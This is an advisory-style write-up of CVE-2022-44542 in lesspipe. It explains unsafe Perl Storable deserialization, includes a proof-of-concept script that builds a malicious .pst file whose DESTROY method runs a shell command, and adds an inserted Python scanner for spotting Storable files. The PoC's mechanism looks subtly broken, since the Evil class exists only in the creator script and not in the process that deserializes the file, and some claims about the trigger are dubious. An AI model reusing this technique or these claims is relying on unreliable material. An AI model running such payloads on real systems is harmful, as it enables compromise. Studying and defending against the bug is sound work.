CVE-2022-44542 - Code Execution in lesspipe via Perl Storable (pst) Files
Summary:
CVE-2022-44542 impacts the popular lesspipe tool (before version 2.06), allowing remote attackers to execute arbitrary code on affected systems by tricking lesspipe into processing a malicious Perl Storable (.pst) file. If an attacker manages to get their evil .pst file on your server or desktop, and you run less or lesspipe against it, your machine could be compromised.
This article will break down the vulnerability, how the exploit works, include some code snippets, and offer protection tips. Don’t worry if you’re not a Perl pro—we’ll keep it simple.
What is lesspipe?
lesspipe is a filter script that previews many file types in the less pager. It runs decompression, formatting, and preview commands depending on the file type. For .pst files (created by Perl's Storable module), lesspipe runs pst2text, which can deserialize files with Perl's built-in Storable module.
The Problem – Bad Deserialization
When lesspipe opens a .pst file, it calls pst2text, which uses Perl's Storable::retrieve function. If you feed Storable a file that's been tampered with, Perl may deserialize objects. Once deserialized objects are destroyed, their DESTROY method (Perl's destructor) fires, and attackers can inject their own code there!
This problem is well-known in many programming languages: unsafe deserialization leads to code execution. In this case, any key/value pair in a Perl hash can trigger code when the object is destroyed.
Exploit Details
Imagine someone uploads a booby-trapped .pst file to a system with a vulnerable lesspipe. If a user previews it (even accidentally), Perl code will execute.
Example Malicious .pst File
Here's a sample exploit using a custom destructor. We create a Perl class with a DESTROY sub, which runs arbitrary commands. We store an instance of this class in a .pst file.
```perl
# evil_creator.pl - create evil .pst
package Evil;
use strict;
use warnings;

sub new { bless {}, shift }

sub DESTROY {
    # Run arbitrary code! For demo: touch /tmp/owned
    system("touch /tmp/owned");
}

package main;
use Storable;

my $evil = Evil->new;
store { foo => $evil }, 'evil.pst';
```
This creates a file named evil.pst. When it is deserialized, DESTROY runs and executes system("touch /tmp/owned").
> To test locally:
> You need Perl and the Storable module.
> Run: perl evil_creator.pl
> Then: less evil.pst (if lesspipe is configured to handle .pst files)
If vulnerable, you’ll find /tmp/owned created.
- The attacker only needs to get their .pst file opened (no extra user interaction).
- Unlike some other bugs, the attacker doesn't need special permissions or to pass extra arguments. Just open the file.

Avoid opening unknown files with less or lesspipe.
You can find the upstream fix in this commit.
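On systems that cannot be upgraded right away, Storable files can be recognised by their header alone, without deserializing them and regardless of file extension. The following is an added example, not code from lesspipe or from this article's original text; the function names and the sample bytes are constructed for illustration, and it assumes the header layout written by Storable's store()/nstore(): the magic `pst0`, a byte holding the major version with the low bit marking network byte order, then a minor version byte.

```python
import sys
from typing import Optional

MAGIC = b"pst0"  # magic written by Storable's store()/nstore()


def storable_header(data: bytes) -> Optional[dict]:
    """Parse the leading bytes of a file; return header fields or None."""
    if len(data) < 6 or not data.startswith(MAGIC):
        return None
    info = {
        "major": data[4] >> 1,          # binary format major version
        "netorder": bool(data[4] & 1),  # True for nstore() output
        "minor": data[5],
        "byteorder": None,
    }
    if not info["netorder"] and len(data) > 6:
        n = data[6]  # length of the native byte-order string
        info["byteorder"] = data[7:7 + n].decode("ascii", "replace")
    return info


def should_block_preview(data: bytes) -> bool:
    """Policy: never hand Storable data to a previewer that deserializes it."""
    return storable_header(data) is not None


def scan(paths):
    """Return [(path, header)] for files that are Storable by content."""
    hits = []
    for path in paths:
        try:
            with open(path, "rb") as fh:
                head = fh.read(32)
        except OSError:
            continue  # unreadable or missing file: skip it
        hdr = storable_header(head)
        if hdr:
            hits.append((path, hdr))
    return hits


# Constructed sample headers (not taken from any real file).
NATIVE = b"pst0" + bytes([0x04, 0x0B, 8]) + b"12345678" + bytes([4, 8, 8, 8])
NETWORK = b"pst0" + bytes([0x05, 0x0B])

if __name__ == "__main__":
    for path, hdr in scan(sys.argv[1:]):
        print(f"{path}: Perl Storable v{hdr['major']}.{hdr['minor']} {hdr}")
```

Run it over an upload or download directory (for example `python3 scan.py /srv/uploads/*`) to list files that should not be passed to a deserializing preview filter.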
Final Notes
Vulnerabilities like CVE-2022-44542 show how dangerous it can be for tools to blindly trust file contents—and how dangerous unsafe deserialization really is. By simply previewing a file, your system could be taken over. Always keep your tools updated, avoid opening unknown files, and disable risky file handlers when you don’t need them.
Timeline
Published on: 11/01/2022 01:15:00 UTC
Last modified on: 12/22/2022 20:37:00 UTC